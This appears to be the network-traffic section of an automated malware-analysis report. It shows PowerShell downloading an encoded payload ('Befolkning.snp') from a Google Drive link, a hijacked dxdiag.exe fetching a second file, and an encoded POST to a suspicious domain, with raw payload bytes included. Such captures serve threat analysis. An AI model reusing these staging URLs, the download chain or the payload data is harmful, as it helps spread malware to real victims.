                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Mar 10, 2025 21:13:31.251759052 CET874OUTPOST /3szq/ HTTP/1.1
                                                                                                      Host: www.natividade.tech
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Origin: http://www.natividade.tech
                                                                                                      Connection: close
                                                                                                      Content-Length: 219
                                                                                                      Cache-Control: max-age=0
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Referer: http://www.natividade.tech/3szq/
                                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G920A Build/LRX22G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36 [Pinterest/Android]
                                                                                                      Data Raw: 53 64 3d 69 58 74 77 61 41 58 46 43 73 68 62 61 54 72 34 55 76 68 4e 35 79 4c 54 4b 50 61 66 4b 6d 56 4b 64 59 37 6f 32 63 77 59 49 4d 6f 6a 55 75 6d 30 50 57 42 46 56 31 6c 74 31 35 32 7a 59 37 4c 30 66 41 2b 62 2f 44 79 4e 69 70 4c 51 6f 32 4c 67 52 58 38 53 64 4f 37 78 57 39 32 49 2b 4b 51 50 32 71 37 79 66 2f 2b 4a 67 5a 6f 53 37 4d 59 45 36 41 48 75 72 43 6a 61 55 52 33 75 64 35 73 76 79 74 5a 41 78 6e 42 4d 6e 70 53 59 68 5a 5a 61 72 71 44 43 6a 56 4a 38 65 67 50 6f 45 6e 43 67 75 4b 35 54 6f 57 70 42 43 56 77 64 47 69 6e 69 6f 49 44 75 2f 6f 61 54 7a 79 78 42 6e 2b 37 77 4b 70 6f 44 73 38 6c 59 67 71 64 71 61 6e 63 4c 59 66 6a 50 50 46 51 3d
                                                                                                      Data Ascii: Sd=iXtwaAXFCshbaTr4UvhN5yLTKPafKmVKdY7o2cwYIMojUum0PWBFV1lt152zY7L0fA+b/DyNipLQo2LgRX8SdO7xW92I+KQP2q7yf/+JgZoS7MYE6AHurCjaUR3ud5svytZAxnBMnpSYhZZarqDCjVJ8egPoEnCguK5ToWpBCVwdGinioIDu/oaTzyxBn+7wKpoDs8lYgqdqancLYfjPPFQ=


                                                                                                      HTTPS Proxied Packets

                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      0192.168.2.449721142.250.184.2064437436C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-03-10 20:11:28 UTC215OUTGET /uc?export=download&id=1G7ZLOA9QZG5-nvAwt0bWX8ierl9MRhgq HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                                                      Host: drive.google.com
                                                                                                      Connection: Keep-Alive
                                                                                                      2025-03-10 20:11:28 UTC1610INHTTP/1.1 303 See Other
                                                                                                      Content-Type: application/binary
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Mon, 10 Mar 2025 20:11:28 GMT
                                                                                                      Location: https://drive.usercontent.google.com/download?id=1G7ZLOA9QZG5-nvAwt0bWX8ierl9MRhgq&export=download
                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy: script-src 'nonce-R5vUiJrQE1alMvH4EmBz4w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Server: ESF
                                                                                                      Content-Length: 0
                                                                                                      X-XSS-Protection: 0
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1192.168.2.449726142.250.184.2064437436C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-03-10 20:11:35 UTC97OUTGET /uc?export=download&id=1G7ZLOA9QZG5-nvAwt0bWX8ierl9MRhgq HTTP/1.1
                                                                                                      Host: drive.google.com
                                                                                                      2025-03-10 20:11:35 UTC1319INHTTP/1.1 303 See Other
                                                                                                      Content-Type: application/binary
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Mon, 10 Mar 2025 20:11:35 GMT
                                                                                                      Location: https://drive.usercontent.google.com/download?id=1G7ZLOA9QZG5-nvAwt0bWX8ierl9MRhgq&export=download
                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-93MKDN5tidmGhEiWOs2hnA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Server: ESF
                                                                                                      Content-Length: 0
                                                                                                      X-XSS-Protection: 0
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2192.168.2.449728216.58.206.334437436C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-03-10 20:11:37 UTC139OUTGET /download?id=1G7ZLOA9QZG5-nvAwt0bWX8ierl9MRhgq&export=download HTTP/1.1
                                                                                                      Host: drive.usercontent.google.com
                                                                                                      Connection: Keep-Alive
                                                                                                      2025-03-10 20:11:40 UTC5017INHTTP/1.1 200 OK
                                                                                                      X-GUploader-UploadID: AKDAyIv7SUo94SKx5-oZqflpIewVxylFnwd9ebmYOBuOyVDe9FVbM6dTGmz71ZUtCx9gNQkIr6sJOA4
                                                                                                      Content-Type: application/octet-stream
                                                                                                      Content-Security-Policy: sandbox
                                                                                                      Content-Security-Policy: default-src 'none'
                                                                                                      Content-Security-Policy: frame-ancestors 'none'
                                                                                                      X-Content-Security-Policy: sandbox
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Cross-Origin-Embedder-Policy: require-corp
                                                                                                      Cross-Origin-Resource-Policy: same-site
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Content-Disposition: attachment; filename="Befolkning.snp"
                                                                                                      Access-Control-Allow-Origin: *
                                                                                                      Access-Control-Allow-Credentials: false
                                                                                                      Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                      Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                      Accept-Ranges: bytes
                                                                                                      Content-Length: 524376
                                                                                                      Last-Modified: Mon, 10 Mar 2025 07:24:32 GMT
                                                                                                      Date: Mon, 10 Mar 2025 20:11:40 GMT
                                                                                                      Expires: Mon, 10 Mar 2025 20:11:40 GMT
                                                                                                      Cache-Control: private, max-age=0
                                                                                                      X-Goog-Hash: crc32c=1NQtHA==
                                                                                                      Server: UploadServer
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Connection: close
                                                                                                      2025-03-10 20:11:40 UTC5017INData Raw: 77 4f 67 41 67 66 2f 58 6c 44 77 46 75 77 64 74 48 51 44 42 35 67 44 42 36 51 41 44 58 43 51 45 5a 73 48 69 41 49 48 2f 77 31 45 79 54 4c 6e 33 49 72 68 53 67 50 45 41 67 38 34 41 67 66 48 4d 4a 78 63 70 77 65 41 41 5a 73 48 6d 41 49 48 78 4f 77 57 76 65 32 59 68 77 4d 48 6f 41 49 44 36 65 34 44 4a 41 4c 72 36 44 41 4b 2b 5a 6f 50 76 41 49 50 4f 41 49 58 4a 2b 44 48 4b 67 2b 6b 41 77 4f 6b 41 69 52 51 4c 5a 6f 50 32 41 49 44 78 41 4e 48 69 5a 69 48 32 67 4f 6b 41 67 38 45 45 5a 73 48 67 41 49 50 4c 41 49 48 35 75 66 57 42 42 48 7a 52 5a 73 48 75 41 4d 44 68 41 49 74 45 4a 41 53 51 5a 6f 58 2f 69 63 4f 51 67 66 36 79 2f 54 73 42 67 63 4d 4b 6f 42 41 42 5a 6f 50 6f 41 4e 6e 51 75 6b 54 42 48 6e 76 34 67 2b 6f 41 67 66 49 34 76 2f 79 5a 6b 47 61 44 79 51 43
                                                                                                      Data Ascii: wOgAgf/XlDwFuwdtHQDB5gDB6QADXCQEZsHiAIH/w1EyTLn3IrhSgPEAg84AgfHMJxcpweAAZsHmAIHxOwWve2YhwMHoAID6e4DJALr6DAK+ZoPvAIPOAIXJ+DHKg+kAwOkAiRQLZoP2AIDxANHiZiH2gOkAg8EEZsHgAIPLAIH5ufWBBHzRZsHuAMDhAItEJASQZoX/icOQgf6y/TsBgcMKoBABZoPoANnQukTBHnv4g+oAgfI4v/yZkGaDyQC
                                                                                                      2025-03-10 20:11:40 UTC4664INData Raw: 57 2b 58 6e 44 31 76 6c 35 77 39 62 35 65 63 50 57 2b 58 6e 44 31 76 6c 35 77 39 62 35 65 63 50 57 2b 58 6e 44 31 76 67 30 6d 77 78 47 5a 76 79 75 2f 6b 67 37 4c 6e 2f 32 30 34 62 71 48 30 47 53 57 4e 59 7a 4a 75 70 59 6b 39 62 35 65 63 50 57 2b 58 6e 44 31 76 6c 35 77 39 62 35 65 63 50 57 2b 58 6e 44 31 76 6c 35 77 39 62 35 65 63 50 57 2b 58 6c 54 79 79 36 42 44 43 77 39 59 61 78 4f 72 57 4c 74 57 43 46 71 67 5a 6f 6d 49 66 43 4f 36 6a 75 4d 66 30 39 51 47 38 51 37 4f 64 47 5a 54 41 39 41 6e 63 56 35 5a 56 7a 35 68 59 2f 2b 36 37 75 50 34 2b 6b 6c 38 79 62 71 51 2f 50 57 2b 58 6e 44 31 76 6c 35 77 39 62 35 65 63 50 57 2b 58 6e 44 31 76 6c 35 77 39 62 35 65 63 50 57 2b 58 6e 44 31 76 6c 35 53 6b 62 52 52 56 4e 41 78 66 32 6b 35 63 45 53 4e 63 44 58 6f 64
                                                                                                      Data Ascii: W+XnD1vl5w9b5ecPW+XnD1vl5w9b5ecPW+XnD1vg0mwxGZvyu/kg7Ln/204bqH0GSWNYzJupYk9b5ecPW+XnD1vl5w9b5ecPW+XnD1vl5w9b5ecPW+XlTyy6BDCw9YaxOrWLtWCFqgZomIfCO6juMf09QG8Q7OdGZTA9AncV5ZVz5hY/+67uP4+kl8ybqQ/PW+XnD1vl5w9b5ecPW+XnD1vl5w9b5ecPW+XnD1vl5SkbRRVNAxf2k5cESNcDXod
                                                                                                      2025-03-10 20:11:40 UTC1323INData Raw: 35 77 39 62 35 65 63 50 57 2b 58 6e 44 31 76 6c 35 77 39 62 35 65 63 50 57 2b 58 6c 70 5a 50 44 36 48 44 6d 79 2b 34 47 47 2b 38 30 6e 48 75 6f 37 69 55 55 4a 44 31 38 65 4c 6d 65 52 62 74 53 6e 6a 68 6c 42 4b 64 58 4e 49 69 35 78 72 58 4c 42 46 61 7a 52 6a 64 57 75 69 4e 37 6e 2f 65 72 78 51 49 4f 6b 32 41 57 2b 5a 7a 48 52 46 4c 58 61 73 66 7a 63 59 6c 32 78 44 48 4e 72 79 65 58 52 36 34 31 78 5a 74 5a 76 79 79 43 4c 79 47 34 50 48 4e 36 63 45 41 74 49 6d 65 6b 71 44 72 58 4f 73 35 4a 6f 31 79 65 34 72 30 38 6d 6e 69 56 67 33 79 6d 74 55 79 34 74 46 73 6e 74 57 61 76 74 45 57 65 6e 65 71 77 39 4e 71 44 42 4b 70 68 6e 63 51 4d 75 52 7a 75 5a 68 55 76 4f 4d 32 75 4d 4a 62 6d 46 59 56 44 54 61 59 6e 63 39 64 6c 35 77 39 62 35 65 63 50 57 2b 58 6e 44 31 76
                                                                                                      Data Ascii: 5w9b5ecPW+XnD1vl5w9b5ecPW+XlpZPD6HDmy+4GG+80nHuo7iUUJD18eLmeRbtSnjhlBKdXNIi5xrXLBFazRjdWuiN7n/erxQIOk2AW+ZzHRFLXasfzcYl2xDHNryeXR641xZtZvyyCLyG4PHN6cEAtImekqDrXOs5Jo1ye4r08mniVg3ymtUy4tFsntWavtEWeneqw9NqDBKphncQMuRzuZhUvOM2uMJbmFYVDTaYnc9dl5w9b5ecPW+XnD1v
                                                                                                      2025-03-10 20:11:40 UTC1378INData Raw: 58 71 72 46 7a 72 59 4c 31 57 66 4b 31 6d 48 42 6c 51 41 50 4b 44 38 7a 73 75 72 44 56 44 42 5a 38 59 45 70 49 68 6a 39 4e 52 64 6d 4d 44 54 2f 37 45 59 4a 4c 63 32 45 36 45 49 68 64 65 35 57 45 61 70 6f 54 78 33 38 64 51 31 69 4f 2b 35 2b 73 6a 75 72 73 4d 79 68 35 6e 65 64 4e 66 49 53 57 30 52 46 4c 42 6d 78 2b 63 2f 58 38 36 36 48 30 65 47 4b 4b 2f 50 74 78 59 6e 79 33 57 38 6a 65 51 48 6a 48 6f 4c 32 78 73 77 57 30 37 6f 6c 69 6f 72 7a 7a 69 73 4d 56 2f 2f 62 78 4f 74 48 78 4c 6d 33 7a 73 36 48 52 42 6b 2b 47 65 35 6c 2b 59 51 54 2b 42 33 2f 47 33 65 6c 67 75 35 39 47 54 4e 33 6e 42 55 6e 54 42 30 4f 56 4f 75 43 66 77 51 52 4c 61 72 44 61 62 2f 4f 37 37 74 64 4c 56 6d 77 66 6f 31 46 4d 78 73 2f 71 4e 42 4e 76 61 7a 48 6e 50 76 74 7a 65 44 46 74 49 6a
                                                                                                      Data Ascii: XqrFzrYL1WfK1mHBlQAPKD8zsurDVDBZ8YEpIhj9NRdmMDT/7EYJLc2E6EIhde5WEapoTx38dQ1iO+5+sjursMyh5nedNfISW0RFLBmx+c/X866H0eGKK/PtxYny3W8jeQHjHoL2xswW07oliorzzisMV//bxOtHxLm3zs6HRBk+Ge5l+YQT+B3/G3elgu59GTN3nBUnTB0OVOuCfwQRLarDab/O77tdLVmwfo1FMxs/qNBNvazHnPvtzeDFtIj
                                                                                                      2025-03-10 20:11:40 UTC1378INData Raw: 6e 30 2b 74 73 67 50 79 39 35 61 48 50 32 71 56 39 7a 58 6d 63 49 36 4e 39 4a 70 7a 77 4c 46 64 35 6d 6c 41 45 45 73 65 79 59 4e 68 7a 4d 72 6b 59 6a 36 39 66 6f 71 7a 49 59 69 62 31 66 52 77 48 48 54 38 79 4a 52 77 53 4b 59 31 6e 68 74 46 6d 70 39 4c 4f 67 63 78 75 38 4d 44 38 76 32 4c 67 75 70 68 2f 46 62 70 67 51 65 54 6d 53 6e 47 55 30 45 33 4a 6c 50 2f 39 6b 45 6d 4c 59 48 51 6c 4c 47 63 55 54 44 52 61 6f 47 64 79 66 2b 70 7a 75 75 37 6a 37 45 64 49 51 61 74 44 30 4b 44 44 32 46 6d 75 44 51 6f 38 77 76 4a 68 4b 42 43 68 61 78 41 43 30 6a 4a 36 6e 6f 4f 70 52 36 7a 42 72 59 42 5a 71 71 31 75 6a 33 72 61 5a 45 75 4b 76 2f 4e 39 64 42 43 42 50 4a 59 52 5a 52 50 49 41 59 33 66 55 37 42 68 6a 56 37 36 48 36 39 68 79 62 39 47 58 66 76 45 5a 39 44 53 75 54
                                                                                                      Data Ascii: n0+tsgPy95aHP2qV9zXmcI6N9JpzwLFd5mlAEEseyYNhzMrkYj69foqzIYib1fRwHHT8yJRwSKY1nhtFmp9LOgcxu8MD8v2Lguph/FbpgQeTmSnGU0E3JlP/9kEmLYHQlLGcUTDRaoGdyf+pzuu7j7EdIQatD0KDD2FmuDQo8wvJhKBChaxAC0jJ6noOpR6zBrYBZqq1uj3raZEuKv/N9dBCBPJYRZRPIAY3fU7BhjV76H69hyb9GXfvEZ9DSuT
                                                                                                      2025-03-10 20:11:40 UTC1378INData Raw: 57 49 55 68 63 61 63 36 67 47 53 46 42 53 73 69 66 68 2f 35 4f 37 61 57 67 6e 38 57 59 76 51 6d 4a 4b 56 6e 43 61 35 46 5a 71 50 32 42 43 70 61 47 66 34 54 43 76 74 4f 79 52 56 43 7a 4a 51 70 59 62 35 53 30 64 56 2b 48 66 54 58 6f 66 6d 79 39 47 66 61 79 2f 39 73 49 36 37 41 49 34 78 39 45 71 6d 38 6d 4e 68 5a 38 4b 6f 57 61 33 43 6e 6a 70 32 38 6d 49 76 78 33 44 67 57 57 7a 33 37 32 4d 57 30 59 4d 73 73 50 77 6c 74 4d 38 73 38 75 34 79 51 78 38 6f 70 50 56 59 39 57 56 78 54 64 49 4d 68 66 51 4f 33 67 6c 6a 67 6d 6e 64 33 30 4a 5a 46 78 42 39 4a 6a 41 64 45 71 4d 2f 31 6c 68 36 66 4d 47 6a 70 47 51 64 36 78 42 6c 53 57 7a 4c 53 41 53 55 30 72 62 6c 49 52 33 63 37 70 68 43 42 6d 42 43 67 62 31 41 4c 38 6e 4d 67 2b 58 78 42 4d 6e 4e 64 5a 6a 69 68 51 30 78
                                                                                                      Data Ascii: WIUhcac6gGSFBSsifh/5O7aWgn8WYvQmJKVnCa5FZqP2BCpaGf4TCvtOyRVCzJQpYb5S0dV+HfTXofmy9Gfay/9sI67AI4x9Eqm8mNhZ8KoWa3Cnjp28mIvx3DgWWz372MW0YMssPwltM8s8u4yQx8opPVY9WVxTdIMhfQO3gljgmnd30JZFxB9JjAdEqM/1lh6fMGjpGQd6xBlSWzLSASU0rblIR3c7phCBmBCgb1AL8nMg+XxBMnNdZjihQ0x
                                                                                                      2025-03-10 20:11:40 UTC1378INData Raw: 7a 4c 72 57 48 48 75 62 33 4a 46 62 6a 6d 6c 70 77 39 31 79 6f 45 46 69 48 41 49 36 30 75 6e 64 6d 38 6d 46 2b 4f 53 34 73 57 57 39 37 4c 6c 74 2b 38 67 4d 43 54 47 6d 59 57 61 32 59 53 77 55 65 30 59 41 41 72 47 33 6b 6d 59 78 73 4f 6e 6a 5a 77 41 6c 68 52 7a 53 57 70 71 54 59 32 43 6e 52 35 57 37 59 7a 61 49 6f 30 48 37 44 43 63 49 43 48 77 48 76 44 62 39 56 63 6a 76 58 6e 46 6d 35 32 6a 4d 4c 35 76 4a 30 68 34 68 42 48 46 6d 34 53 7a 6d 72 78 76 4a 33 32 55 48 44 48 48 70 34 75 54 4e 6f 31 63 48 48 57 73 79 57 6b 45 78 54 7a 4d 74 36 78 43 49 2f 57 74 36 39 2f 41 47 5a 69 71 56 43 46 33 66 72 74 4e 44 5a 38 72 69 52 59 4e 38 32 70 75 64 67 69 42 67 69 41 2f 30 57 73 61 72 30 6b 68 64 58 48 79 34 49 53 42 55 4d 2f 37 6d 41 39 47 43 4c 6d 48 66 70 4c 33
                                                                                                      Data Ascii: zLrWHHub3JFbjmlpw91yoEFiHAI60undm8mF+OS4sWW97Llt+8gMCTGmYWa2YSwUe0YAArG3kmYxsOnjZwAlhRzSWpqTY2CnR5W7YzaIo0H7DCcICHwHvDb9VcjvXnFm52jML5vJ0h4hBHFm4SzmrxvJ32UHDHHp4uTNo1cHHWsyWkExTzMt6xCI/Wt69/AGZiqVCF3frtNDZ8riRYN82pudgiBgiA/0Wsar0khdXHy4ISBUM/7mA9GCLmHfpL3
                                                                                                      2025-03-10 20:11:40 UTC1378INData Raw: 62 35 65 63 50 57 2b 58 6c 38 66 43 30 49 6f 2b 56 30 6c 65 44 41 74 6b 6f 62 62 69 69 4a 34 39 62 78 34 68 7a 57 36 58 6e 4c 53 49 78 79 54 56 57 31 43 55 4f 49 49 32 71 69 64 61 45 56 66 77 57 4a 49 78 33 71 42 39 79 71 48 6d 63 5a 55 37 38 71 35 65 54 6e 2f 74 32 59 4e 59 31 59 71 4a 66 70 31 46 32 52 6c 79 6e 42 39 33 4b 53 35 4c 7a 73 73 31 31 6f 46 45 44 30 65 4d 74 79 59 62 6a 44 75 4d 6a 33 35 79 41 61 75 6f 73 68 6a 52 4d 52 4e 77 5a 54 67 63 49 63 31 75 6c 35 79 30 32 68 43 64 50 57 38 65 51 6d 7a 57 68 2b 37 68 45 52 5a 64 38 7a 51 4d 4a 4c 79 65 45 45 46 55 49 78 5a 31 4e 2b 66 2f 37 72 79 75 31 6f 35 32 6d 42 36 46 6e 56 58 64 39 4c 61 79 67 56 31 32 48 70 32 44 30 53 2b 73 6b 30 47 72 44 6a 36 36 63 57 74 53 38 6e 6a 50 38 6e 33 52 4a 4a 64
                                                                                                      Data Ascii: b5ecPW+Xl8fC0Io+V0leDAtkobbiiJ49bx4hzW6XnLSIxyTVW1CUOII2qidaEVfwWJIx3qB9yqHmcZU78q5eTn/t2YNY1YqJfp1F2RlynB93KS5Lzss11oFED0eMtyYbjDuMj35yAauoshjRMRNwZTgcIc1ul5y02hCdPW8eQmzWh+7hERZd8zQMJLyeEEFUIxZ1N+f/7ryu1o52mB6FnVXd9LaygV12Hp2D0S+sk0GrDj66cWtS8njP8n3RJJd
                                                                                                      2025-03-10 20:11:40 UTC1378INData Raw: 4e 55 68 31 4c 72 31 69 78 74 70 42 59 58 34 48 72 43 76 45 4f 7a 45 70 72 69 63 78 30 4a 53 78 6e 42 35 78 38 57 73 42 6e 5a 58 6d 41 56 6f 36 55 64 62 5a 58 43 44 34 4e 32 34 54 56 45 33 71 4a 4d 50 4c 4c 69 55 4e 51 52 4b 55 48 6b 69 32 31 70 2b 6f 41 31 72 52 55 55 59 6c 4d 6f 5a 69 65 72 41 55 75 63 62 30 72 59 30 6d 4f 6f 39 35 65 63 50 57 42 51 71 6a 56 76 6c 35 77 39 62 35 65 63 50 57 2b 58 6e 44 31 76 6c 35 77 39 62 35 65 63 50 57 2b 58 6e 44 31 76 6c 35 77 39 62 35 65 63 4c 4c 59 72 37 73 73 46 5a 33 53 35 6c 57 68 6a 74 69 4f 7a 6c 4c 5a 75 31 78 55 38 31 78 41 45 39 67 64 62 31 53 32 6a 38 65 39 72 61 59 4c 4d 35 70 58 38 64 77 5a 54 4a 73 38 68 4b 69 39 43 51 46 67 35 4b 42 71 55 54 2f 59 50 39 47 4a 7a 79 33 4c 59 35 32 33 58 46 6e 6d 70 45
                                                                                                      Data Ascii: NUh1Lr1ixtpBYX4HrCvEOzEpricx0JSxnB5x8WsBnZXmAVo6UdbZXCD4N24TVE3qJMPLLiUNQRKUHki21p+oA1rRUUYlMoZierAUucb0rY0mOo95ecPWBQqjVvl5w9b5ecPW+XnD1vl5w9b5ecPW+XnD1vl5w9b5ecLLYr7ssFZ3S5lWhjtiOzlLZu1xU81xAE9gdb1S2j8e9raYLM5pX8dwZTJs8hKi9CQFg5KBqUT/YP9GJzy3LY523XFnmpE
                                                                                                      2025-03-10 20:11:40 UTC1378INData Raw: 53 33 4f 48 2b 46 7a 48 51 36 75 51 56 50 6b 52 50 6f 30 69 71 2f 45 78 57 50 6f 51 4b 57 59 77 49 79 31 6c 68 47 34 59 6d 70 6d 32 67 71 47 4b 62 58 6e 37 37 4e 33 53 76 52 36 72 43 61 35 4e 5a 4f 74 37 77 37 78 62 73 33 4d 72 33 63 4a 51 73 64 57 55 54 76 4c 66 73 4c 6b 6b 43 6c 63 2f 4b 43 66 53 76 76 73 4b 4f 5a 57 30 55 4a 6c 45 55 56 42 6f 57 30 62 6e 34 68 69 49 45 34 52 34 6d 56 65 37 48 51 6c 4c 44 44 6b 67 2b 38 63 6b 76 4d 68 55 4a 42 42 6e 2f 46 32 49 57 72 47 64 71 56 43 69 77 77 48 35 71 38 75 68 35 6e 43 64 4f 76 4c 78 70 65 38 64 6e 58 36 34 2f 57 64 57 4b 30 47 64 55 34 4b 32 2b 45 58 62 39 6e 36 55 39 39 74 54 74 49 47 73 68 48 32 71 57 2b 42 58 6b 6f 37 74 79 43 42 32 62 42 6a 61 4d 42 4e 67 5a 65 36 37 75 4c 33 69 37 7a 6c 56 51 52 75
                                                                                                      Data Ascii: S3OH+FzHQ6uQVPkRPo0iq/ExWPoQKWYwIy1lhG4Ympm2gqGKbXn77N3SvR6rCa5NZOt7w7xbs3Mr3cJQsdWUTvLfsLkkClc/KCfSvvsKOZW0UJlEUVBoW0bn4hiIE4R4mVe7HQlLDDkg+8ckvMhUJBBn/F2IWrGdqVCiwwH5q8uh5nCdOvLxpe8dnX64/WdWK0GdU4K2+EXb9n6U99tTtIGshH2qW+BXko7tyCB2bBjaMBNgZe67uL3i7zlVQRu


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      3192.168.2.449732172.217.23.1104437812C:\Windows\SysWOW64\dxdiag.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-03-10 20:12:36 UTC216OUTGET /uc?export=download&id=1OVlUq0BDU-cYs5xvYogyJd5qIDQB1pER HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                                                      Host: drive.google.com
                                                                                                      Cache-Control: no-cache
                                                                                                      2025-03-10 20:12:37 UTC1610INHTTP/1.1 303 See Other
                                                                                                      Content-Type: application/binary
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Mon, 10 Mar 2025 20:12:37 GMT
                                                                                                      Location: https://drive.usercontent.google.com/download?id=1OVlUq0BDU-cYs5xvYogyJd5qIDQB1pER&export=download
                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy: script-src 'nonce-aOA1aqnoEKpNYHDhRH8XqQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
